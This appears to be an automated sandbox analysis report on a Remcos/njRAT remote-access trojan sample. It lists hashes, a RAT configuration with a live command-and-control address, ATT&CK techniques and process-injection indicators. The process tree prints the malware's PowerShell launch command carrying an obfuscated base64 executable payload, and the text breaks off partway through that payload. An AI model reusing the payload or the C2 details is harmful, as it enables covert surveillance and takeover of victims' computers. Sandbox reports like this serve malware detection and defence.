njrat | 945d6733019ee4f96230d89115077cc29dcce00dda751904d7a2f4f8a8fb9216

Analysis

max time kernel
120s
max time network
118s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13-09-2024 12:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cd504cef7f56bd1eab39169ff8a3ae30N.exe
Size

3.4MB
MD5

cd504cef7f56bd1eab39169ff8a3ae30
SHA1

d00657d419f95ab98eca4d141eaf910a08de04ad
SHA256

945d6733019ee4f96230d89115077cc29dcce00dda751904d7a2f4f8a8fb9216
SHA512

d545276baccd04d53d4a0f25d1f2111a0bd7cd556aa0f393beb35e6ff693cc6cc61a95f9e411fd47dd724cb166cefc63bb6c82236bb2737f99ec627ad1c1c94d
SSDEEP

98304:X9pJVbueNPOFjk2va/ZopyhrMrZsPIWxVH:X93VBNWFQ2SBgyxPI2V

Score

10^/10

njrat remcos arschlecken discovery execution rat trojan

Malware Config

Extracted

Family

remcos

Botnet

arschlecken

46.8.221.61:443

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-BYU2FY
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	1436	WScript.exe
17	1156	powershell.exe
18	4568	powershell.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/4568-68-0x0000000006AF0000-0x0000000006B08000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js	cd504cef7f56bd1eab39169ff8a3ae30N.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3060	powershell.exe
1156	powershell.exe
4568	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4568 set thread context of 4512	4568	powershell.exe	100
PID 4568 set thread context of 1428	4568	powershell.exe	101

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1548	548	WerFault.exe	82

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regbrowsers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cd504cef7f56bd1eab39169ff8a3ae30N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1156	powershell.exe
1156	powershell.exe
3060	powershell.exe
3060	powershell.exe
3060	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4512	aspnet_regbrowsers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	548	cd504cef7f56bd1eab39169ff8a3ae30N.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe
Token: SeIncBasePriorityPrivilege	1428	aspnet_regbrowsers.exe
Token: 33	1428	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 548 wrote to memory of 1436	548	cd504cef7f56bd1eab39169ff8a3ae30N.exe	86
PID 548 wrote to memory of 1436	548	cd504cef7f56bd1eab39169ff8a3ae30N.exe	86
PID 548 wrote to memory of 1436	548	cd504cef7f56bd1eab39169ff8a3ae30N.exe	86
PID 1436 wrote to memory of 1156	1436	WScript.exe	89
PID 1436 wrote to memory of 1156	1436	WScript.exe	89
PID 1436 wrote to memory of 1156	1436	WScript.exe	89
PID 1156 wrote to memory of 3060	1156	powershell.exe	93
PID 1156 wrote to memory of 3060	1156	powershell.exe	93
PID 1156 wrote to memory of 3060	1156	powershell.exe	93
PID 3060 wrote to memory of 4568	3060	powershell.exe	95
PID 3060 wrote to memory of 4568	3060	powershell.exe	95
PID 3060 wrote to memory of 4568	3060	powershell.exe	95
PID 4568 wrote to memory of 4644	4568	powershell.exe	99
PID 4568 wrote to memory of 4644	4568	powershell.exe	99
PID 4568 wrote to memory of 4644	4568	powershell.exe	99
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 4512	4568	powershell.exe	100
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101
PID 4568 wrote to memory of 1428	4568	powershell.exe	101

C:\Users\Admin\AppData\Local\Temp\cd504cef7f56bd1eab39169ff8a3ae30N.exe
"C:\Users\Admin\AppData\Local\Temp\cd504cef7f56bd1eab39169ff8a3ae30N.exe"
1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:548
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LAtEb = 'TVqQ↓:↓↓:↓M↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓//8↓:↓↓:↓Lg↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓↓:↓4fug4↓:↓t↓:↓nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓BQRQ↓:↓↓:↓T↓:↓ED↓:↓JmqXpc↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓O↓:↓↓:↓Ii↓:↓L↓:↓V↓:↓↓:↓↓:↓B4↓:↓↓:↓↓:↓↓:↓G↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓1j0↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓G↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓M↓:↓YIU↓:↓↓:↓B↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓II9↓:↓↓:↓BP↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓GgD↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓G↓:↓↓:↓↓:↓↓:↓w↓:↓↓:↓↓:↓D↓:↓P↓:↓↓:↓↓:↓O↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓CC↓:↓↓:↓↓:↓Eg↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓C50ZXh0↓:↓↓:↓↓:↓↓:↓3B0↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓Hg↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓G↓:↓ucnNyYw↓:↓↓:↓↓:↓GgD↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓B↓:↓LnJlbG9j↓:↓↓:↓↓:↓M↓:↓↓:↓↓:↓↓:↓↓:↓G↓:↓↓:↓↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓↓:↓J↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓Qg↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓C2PQ↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓Eg↓:↓↓:↓↓:↓↓:↓C↓:↓↓:↓U↓:↓uCM↓:↓↓:↓F↓:↓Y↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓g8↓:↓↓:↓C4↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓B4CKBc↓:↓↓:↓↓:↓oqHgIoG↓:↓↓:↓↓:↓Ciqmcxk↓:↓↓:↓↓:↓q↓:↓↓:↓Q↓:↓↓:↓BHMa↓:↓↓:↓↓:↓Kg↓:↓I↓:↓↓:↓↓:↓RzGw↓:↓↓:↓Co↓:↓D↓:↓↓:↓↓:↓Ecxw↓:↓↓:↓↓:↓q↓:↓B↓:↓↓:↓↓:↓BCoufgE↓:↓↓:↓↓:↓RvHQ↓:↓↓:↓CioufgI↓:↓↓:↓↓:↓RvHg↓:↓↓:↓CioufgM↓:↓↓:↓↓:↓RvHw↓:↓↓:↓CioufgQ↓:↓↓:↓↓:↓RvI↓:↓↓:↓↓:↓CirGfgU↓:↓↓:↓↓:↓QUKCE↓:↓↓:↓↓:↓osHnIB↓:↓↓:↓Bw0↓:↓U↓:↓↓:↓↓:↓IoIg↓:↓↓:↓Cm8j↓:↓↓:↓↓:↓KcyQ↓:↓↓:↓↓:↓q↓:↓BQ↓:↓↓:↓BH4F↓:↓↓:↓↓:↓EKhp+Bg↓:↓↓:↓BCoe↓:↓o↓:↓G↓:↓↓:↓↓:↓EKlZzD↓:↓↓:↓↓:↓Bigl↓:↓↓:↓↓:↓Kd↓:↓Y↓:↓↓:↓↓:↓K↓:↓Bw↓:↓↓:↓BCoe↓:↓igm↓:↓↓:↓↓:↓KKhp+Bw↓:↓↓:↓BCoaK↓:↓0↓:↓↓:↓↓:↓YqHgIoJw↓:↓↓:↓Cio↓:↓Gz↓:↓E↓:↓JgB↓:↓↓:↓↓:↓B↓:↓↓:↓↓:↓RKCg↓:↓↓:↓↓:↓oKKCg↓:↓↓:↓↓:↓pyMQ↓:↓↓:↓cCgp↓:↓↓:↓↓:↓KJgQoKg↓:↓↓:↓Ciw0↓:↓28r↓:↓↓:↓↓:↓KBm8r↓:↓↓:↓↓:↓Kbyw↓:↓↓:↓↓:↓oLBywGBxcuGysZ↓:↓x0oLQ↓:↓↓:↓CgMoLg↓:↓↓:↓Cigv↓:↓↓:↓↓:↓KD↓:↓goM↓:↓↓:↓↓:↓Ct4OJSgx↓:↓↓:↓↓:↓KDSgy↓:↓↓:↓↓:↓K3g↓:↓↓:↓I↓:↓↓:↓M↓:↓↓:↓↓:↓oMw↓:↓↓:↓Cn40↓:↓↓:↓↓:↓KEwR+N↓:↓↓:↓↓:↓ChMFczU↓:↓↓:↓↓:↓olKDY↓:↓↓:↓↓:↓pvNw↓:↓↓:↓CiUlcj0↓:↓↓:↓H↓:↓oEQ↓:↓↓:↓Bm84↓:↓↓:↓↓:↓Kbzk↓:↓↓:↓↓:↓pvO↓:↓↓:↓↓:↓ChMEEQRysQ↓:↓↓:↓cHK5↓:↓↓:↓Bwbzo↓:↓↓:↓↓:↓ooEQ↓:↓↓:↓BhMEJSUCKBE↓:↓↓:↓↓:↓ZvO↓:↓↓:↓↓:↓Cm84↓:↓↓:↓↓:↓KKBE↓:↓↓:↓↓:↓YTBREFcrk↓:↓↓:↓HBysQ↓:↓↓:↓cG86↓:↓↓:↓↓:↓KEwVvOw↓:↓↓:↓ChQmKCg↓:↓↓:↓↓:↓pyMQ↓:↓↓:↓cCgp↓:↓↓:↓↓:↓KEwZ+N↓:↓↓:↓↓:↓ChMHczU↓:↓↓:↓↓:↓olKDY↓:↓↓:↓↓:↓pvNw↓:↓↓:↓CiVyvQ↓:↓↓:↓cCgR↓:↓↓:↓↓:↓Gczw↓:↓↓:↓↓:↓pvPQ↓:↓↓:↓ChMHEQdvOQ↓:↓↓:↓CnM8↓:↓↓:↓↓:↓Kbz0↓:↓↓:↓↓:↓oTBxQmEQdyOQE↓:↓cBEFbzo↓:↓↓:↓↓:↓pySQE↓:↓cBEEbzo↓:↓↓:↓↓:↓oTBxEGEQcoPg↓:↓↓:↓Cig/↓:↓↓:↓↓:↓KclkB↓:↓H↓:↓RBigp↓:↓↓:↓↓:↓KFhYVKE↓:↓↓:↓↓:↓↓:↓om3g8lKDE↓:↓↓:↓↓:↓oTCCgy↓:↓↓:↓↓:↓K3g↓:↓qQTQ↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓W↓:↓↓:↓↓:↓↓:↓Pg↓:↓↓:↓↓:↓FQ↓:↓↓:↓↓:↓↓:↓O↓:↓↓:↓↓:↓↓:↓Ig↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓Bj↓:↓↓:↓↓:↓↓:↓JQE↓:↓↓:↓IgB↓:↓↓:↓↓:↓P↓:↓↓:↓↓:↓↓:↓Ig↓:↓↓:↓↓:↓R4CKEE↓:↓↓:↓↓:↓oqNgIDKEI↓:↓↓:↓↓:↓ooQw↓:↓↓:↓Cioe↓:↓ihE↓:↓↓:↓↓:↓KKi7QCQ↓:↓↓:↓↓:↓igi↓:↓↓:↓↓:↓KKh4CKEU↓:↓↓:↓↓:↓oq↓:↓↓:↓↓:↓TM↓:↓E↓:↓F↓:↓↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓BECj↓:↓U↓:↓↓:↓BstCCgB↓:↓↓:↓↓:↓rCisC↓:↓goGKiID/hUF↓:↓↓:↓↓:↓bKh4CKCc↓:↓↓:↓↓:↓oq↓:↓↓:↓↓:↓↓:↓Ez↓:↓C↓:↓Cg↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓R↓:↓ntH↓:↓↓:↓↓:↓Kb0g↓:↓↓:↓↓:↓oKBowI↓:↓↓:↓↓:↓bLRIo↓:↓g↓:↓↓:↓KwoCe0c↓:↓↓:↓↓:↓oGb0k↓:↓↓:↓↓:↓oGKkoCKCc↓:↓↓:↓↓:↓oCc0o↓:↓↓:↓↓:↓p9Rw↓:↓↓:↓Cio↓:↓QlNKQgE↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓↓:↓HY0Lj↓:↓uMz↓:↓zMTk↓:↓↓:↓↓:↓↓:↓↓:↓BQBs↓:↓↓:↓↓:↓↓:↓c↓:↓g↓:↓↓:↓CN+↓:↓↓:↓DcC↓:↓↓:↓↓:↓N↓:↓k↓:↓↓:↓CNTdHJpbmdz↓:↓↓:↓↓:↓↓:↓↓:↓B↓:↓S↓:↓↓:↓D0↓:↓Q↓:↓↓:↓I1VT↓:↓↓:↓QU↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓I0dVSUQ↓:↓↓:↓↓:↓↓:↓UF↓:↓↓:↓↓:↓P↓:↓Q↓:↓↓:↓CNCbG9i↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓FXFaIJCQ8↓:↓↓:↓↓:↓D6↓:↓TM↓:↓Fg↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓Dc↓:↓↓:↓↓:↓↓:↓K↓:↓↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓↓:↓Bo↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓Sg↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓↓:↓BQ↓:↓↓:↓↓:↓↓:↓k↓:↓↓:↓↓:↓↓:↓K↓:↓↓:↓↓:↓↓:↓C↓:↓↓:↓↓:↓↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓↓:↓↓:↓Q↓:↓↓:↓↓:↓↓:↓I↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓↓:↓↓:↓g↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓9gQB↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓G↓:↓KYDrQcG↓:↓BMErQcG↓:↓H0C7gYP↓:↓BsI↓:↓↓:↓↓:↓G↓:↓L4CtgUG↓:↓IkDtgUG↓:↓PoDtgUG↓:↓MYDtgUG↓:↓N8DtgUG↓:↓↓:↓UDtgUG↓:↓KoCZwcG↓:↓CYCZwcG↓:↓FEDtgUG↓:↓C↓:↓DZgQK↓:↓EkCd↓:↓YK↓:↓PYB4↓:↓QK↓:↓JEC4↓:↓QO↓:↓LsBPQcO↓:↓KQG↓:↓QcG↓:↓DkD7gYO↓:↓NUChgcO↓:↓O0Cr↓:↓↓:↓G↓:↓IUIIwUO↓:↓J↓:↓GPQcO↓:↓G4Dr↓:↓↓:↓G↓:↓I4BIwUO↓:↓↓:↓E↓:↓tgQK↓:↓DQCRQUG↓:↓G↓:↓C7gYG↓:↓↓:↓sCrQcG↓:↓F↓:↓GzQcG↓:↓NIFlQUK↓:↓MsBg↓:↓UG↓:↓MgFIwUG↓:↓C0BIwUG↓:↓BEJtgUK↓:↓NYBg↓:↓UG↓:↓K0EZ↓:↓↓:↓G↓:↓JEEIwUO↓:↓GMIhgcG↓:↓LcIIwWn↓:↓D4G↓:↓↓:↓↓:↓G↓:↓FEBZ↓:↓↓:↓O↓:↓Jc↓:↓hgcK↓:↓G↓:↓GlggK↓:↓HYBlggK↓:↓K0IlggG↓:↓F0EzQgK↓:↓MMI4↓:↓QK↓:↓LIEIwUO↓:↓KoFr↓:↓↓:↓O↓:↓FYBr↓:↓↓:↓O↓:↓CoIr↓:↓↓:↓G↓:↓G8IrQcG↓:↓NcGIwU↓:↓↓:↓↓:↓↓:↓↓:↓SQ↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓Q↓:↓B↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓ByBfwISQ↓:↓B↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓KIG/↓:↓hN↓:↓↓:↓E↓:↓↓:↓g↓:↓↓:↓↓:↓R↓:↓↓:↓j↓:↓j8CF0↓:↓↓:↓Q↓:↓D↓:↓↓:↓↓:↓B↓:↓↓:↓DvB94HXQ↓:↓F↓:↓↓:↓g↓:↓↓:↓↓:↓EQ↓:↓D8I/↓:↓iF↓:↓↓:↓c↓:↓Cw↓:↓↓:↓↓:↓Q↓:↓↓:↓I↓:↓n8CF0↓:↓C↓:↓↓:↓O↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓r↓:↓DI↓:↓XQ↓:↓I↓:↓↓:↓8↓:↓BQE↓:↓↓:↓C8H↓:↓↓:↓Bd↓:↓↓:↓g↓:↓Eg↓:↓F↓:↓Q↓:↓↓:↓E↓:↓↓:↓↓:↓↓:↓F0↓:↓C↓:↓↓:↓Z↓:↓DE↓:↓BwZR↓:↓TE↓:↓3gVZ↓:↓TE↓:↓8gVh↓:↓TE↓:↓I↓:↓Zp↓:↓RE↓:↓LwVx↓:↓RE↓:↓qwF1↓:↓RE↓:↓/↓:↓B6↓:↓SE↓:↓5ggi↓:↓V↓:↓g↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓YY4QYG↓:↓↓:↓E↓:↓WC↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓BhjhBgY↓:↓↓:↓QBgI↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓RGOcGtQ↓:↓B↓:↓Iog↓:↓↓:↓↓:↓↓:↓↓:↓BMIlQZ+↓:↓QE↓:↓li↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓EwhiBYMB↓:↓QCiI↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓TCIwGi↓:↓EB↓:↓K4g↓:↓↓:↓↓:↓↓:↓↓:↓BMIHweN↓:↓QE↓:↓ui↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓EwhMBpIB↓:↓QDsI↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓TCJMBlwEB↓:↓PMg↓:↓↓:↓↓:↓↓:↓↓:↓BMInwGd↓:↓QE↓:↓+y↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓ERjnBrU↓:↓↓:↓g↓:↓RIQ↓:↓↓:↓↓:↓↓:↓↓:↓GGOEGBg↓:↓C↓:↓Bkh↓:↓↓:↓